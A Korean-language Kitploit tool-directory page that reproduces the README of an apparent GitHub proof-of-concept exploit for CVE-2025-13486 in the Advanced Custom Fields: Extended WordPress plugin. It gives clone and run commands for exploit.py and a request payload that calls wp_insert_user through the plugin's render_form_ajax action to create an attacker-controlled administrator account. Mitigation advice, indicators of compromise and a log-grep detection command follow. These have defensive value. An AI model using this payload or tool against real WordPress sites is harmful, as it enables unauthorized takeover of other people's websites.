Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-13486 — Advanced Custom Fields Extended (ACFE) WordPress Plugin Exploit RCE - 관리자 생성 | Kitploit
도구/GitHubGitHub/0xgh057r3c0n/cve-2025-13486
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHub0xgh057r3c0n/cve-2025-13486

CVE-2025-13486

Advanced Custom Fields Extended (ACFE) WordPress Plugin Exploit RCE - 관리자 생성

저장소 보기
118개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🔴 CVE-2025-13486 - Advanced Custom Fields Extended (ACFE) WordPress 플러그인 익스플로잇

WordPress Python License Status

WordPress Logo

📋 개요

CVE-2025-13486에 대한 개념 증명 익스플로잇입니다. Advanced Custom Fields: Extended (ACFE) WordPress 플러그인의 치명적인 취약점으로, 원격 코드 실행을 통해 권한 상승이 가능합니다.

🎯 취약점 세부 정보

항목세부 내용
CVE IDCVE-2025-13486
플러그인Advanced Custom Fields: Extended (ACFE)
유형원격 코드 실행 → 권한 상승
위험 수준치명적
영향을 받는 버전ACFE 취약 버전 (구체적 버전 미정)
CVSS 점수9.8 치명적
발견 날짜2025
작성자0xgh057r3c0n

⚠️ 윤리적 사용 고지

⚠️ 경고: 이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용해야 합니다.

✅ 허용되는 사용:

  • 보안 연구 및 교육
  • 자신의 시스템 테스트
  • 서면 승인을 받은 공인된 침투 테스트
  • 학술 연구 및 교육
  • 보안 인식 교육

❌ 금지되는 사용:

  • 소유하지 않은 시스템에 대한 무단 테스트
  • 악의적인 공격 또는 해킹
  • 모든 불법 활동
  • 컴퓨터 사기 방지법(CFAA 등) 위반
  • 비윤리적 보안 테스트

작성자는 이 도구의 오용에 대해 책임을 지지 않습니다. 시스템을 테스트하기 전에 항상 적절한 서면 승인을 받으십시오.

🔧 기능

🔍 확인 모드

  • WordPress 페이지에서 nonce 추출
  • print_r 함수를 사용한 취약점 확인
  • 익스플로잇 없는 안전한 확인
  • nonce 탐지를 위한 다중 패턴 매칭

⚡ 익스플로잇 모드

  • wp_insert_user를 통한 관리자 사용자 생성
  • 사용자 정의 또는 무작위 생성된 자격 증명
  • 사용자 정의 사용자 이름, 비밀번호, 이메일 지원
  • 성공 표시기를 위한 응답 분석

🛠️ 기술적 기능

  • 자동 프로토콜 감지 (HTTP/HTTPS)
  • 컬러 코드 터미널 출력
  • 테스트 환경을 위한 SSL 인증서 우회
  • 상세한 오류 보고 및 디버깅
  • 세션 시간 초과 및 연결 처리

📦 설치

요구 사항

  • Python 3.6+
  • requests 라이브러리

설정

root@kitploit:~
# 저장소 복제
git clone https://github.com/0xgh057r3c0n/CVE-2025-13486.git
cd CVE-2025-13486

# 의존성 설치
pip install requests

# 또는 requirements.txt에서 설치
pip install -r requirements.txt

# 스크립트 실행 가능하게 설정 (Linux/Mac)
chmod +x exploit.py

의존성

requirements.txt 파일 생성:

root@kitploit:~
requests>=2.25.1

🚀 사용법

기본 구문

root@kitploit:~
python3 exploit.py --url <대상_URL> [옵션]

예제

1. 취약점 확인만 수행 (안전한 테스트)

root@kitploit:~
python3 exploit.py --url http://target.com --verify

2. 무작위 자격 증명으로 익스플로잇

root@kitploit:~
python3 exploit.py --url https://target.com

3. 사용자 정의 자격 증명으로 익스플로잇

root@kitploit:~
python3 exploit.py --url https://target.com \
  --user backup_admin \
  --password "P@ssw0rd123!" \
  --email [email protected]

4. 프로토콜 없는 대상 (자동 감지)

root@kitploit:~
python3 exploit.py --url target.com --verify

명령줄 옵션

🧪 작동 방식

1. 취약점 메커니즘

익스플로잇은 ACFE 플러그인의 acfe/form/render_form_ajax 엔드포인트에서 함수 처리가 부적절하게 이루어지는 점을 이용하여 공격자가 임의의 PHP 함수를 호출할 수 있도록 합니다.

2. 기술적 흐름

root@kitploit:~
1. URL 검증 → HTTP/HTTPS 자동 감지
2. Nonce 추출 → 페이지에서 ACF nonce 스캔
3. 페이로드 구성 → 악성 AJAX 요청 생성
4. 요청 실행 → 대상에 익스플로잇 전송
5. 결과 분석 → 성공 표시기 확인

3. 익스플로잇 페이로드

root@kitploit:~
// ACFE의 취약한 코드 패턴
$result = call_user_func_array($form['render'], array($form));

// 익스플로잇 페이로드 구조
{
    "action": "acfe/form/render_form_ajax",
    "nonce": "extracted_nonce",
    "form[render]": "wp_insert_user",
    "form[user_login]": "attacker_user",
    "form[user_pass]": "attacker_pass",
    "form[user_email]": "[email protected]",
    "form[role]": "administrator"
}

🛡️ 완화 조치

즉시 조치

  1. 플러그인 업데이트: ACFE 플러그인을 최신 버전으로 즉시 업데이트
  2. 플러그인 제거: 업데이트가 불가능한 경우 ACFE를 일시적으로 비활성화
  3. 웹 애플리케이션 방화벽: 악성 요청을 차단하는 WAF 규칙 배포
  4. 모니터링: 의심스러운 관리자 사용자 생성 모니터링

WordPress 보안 강화

root@kitploit:~
# 권장 보안 플러그인
1. Wordfence Security
2. Sucuri Security
3. iThemes Security
4. All In One WP Security

# 서버 수준 보호
- 속도 제한 구현
- mod_security 규칙 활성화
- Cloudflare 또는 유사 CDN 사용
- 정기적인 보안 감사

🔍 탐지

침해 지표 (IOC)

  • 승인되지 않은 관리자 사용자 생성
  • /wp-admin/admin-ajax.php에 대한 의심스러운 AJAX 요청
  • action=acfe/form/render_form_ajax를 포함한 요청
  • AJAX를 통한 예상치 못한 wp_insert_user 함수 호출

로그 모니터링

root@kitploit:~
# Apache 로그
grep "admin-ajax.php" /var/log/apache2/access.log | grep "acfe/form"

# WordPress 디버그 로그
define('WP_DEBUG', true);
define('WP_DEBUG_LOG', true);

📚 참고 자료

  1. WordPress 플러그인 저장소: Advanced Custom Fields: Extended
  2. CVE 데이터베이스: CVE-2025-13486
  3. WordPress 보안 팀: 플러그인 보안 가이드라인
  4. OWASP Top 10: 인젝션 공격

🤝 기여

  1. 저장소 포크
  2. 기능 브랜치 생성 (git checkout -b feature/improvement)
  3. 변경 사항 커밋 (git commit -am 'Add new feature')
  4. 브랜치 푸시 (git push origin feature/improvement)
  5. Pull Request 생성

기여자 가이드라인

  • PEP 8 Python 스타일 가이드 준수
  • 복잡한 로직에 주석 추가
  • 오류 처리 포함
  • 문서 업데이트

🐛 문제 보고

버그 및 문제는 다음을 통해 보고해 주세요:

  1. GitHub Issues: 새 이슈 생성
  2. 보안 취약점: 먼저 작성자에게 책임 있는 공개

📊 프로젝트 구조

root@kitploit:~
CVE-2025-13486/
├── exploit.py          # 주 익스플로잇 스크립트
├── README.md           # 본 문서
├── requirements.txt    # Python 의존성
├── LICENSE            # MIT 라이선스 파일
├── examples/          # 사용 예제
│   ├── verification.txt
│   └── exploitation.txt
└── tests/             # 테스트 스크립트
    ├── test_verify.py
    └── test_exploit.py

👨‍💻 작성자

0xgh057r3c0n - 보안 연구원

  • GitHub: @0xgh057r3c0n
  • Twitter: @0xgh057r3c0n

📜 라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.

보안 커뮤니티를 위한 ❤️로 제작됨
⚠️ 책임감 있고 윤리적으로 사용하세요 ⚠️

도구 다운로드
옵션설명필수기본값
-u, --url대상 WordPress URL예-
--verify확인만 수행, 익스플로잇 없음아니요False
--user관리자 사용자 정의 사용자 이름아니요admin_XXXXX
--password관리자 사용자 정의 비밀번호아니요무작위 12자
--email관리자 사용자 정의 이메일아니요[email protected]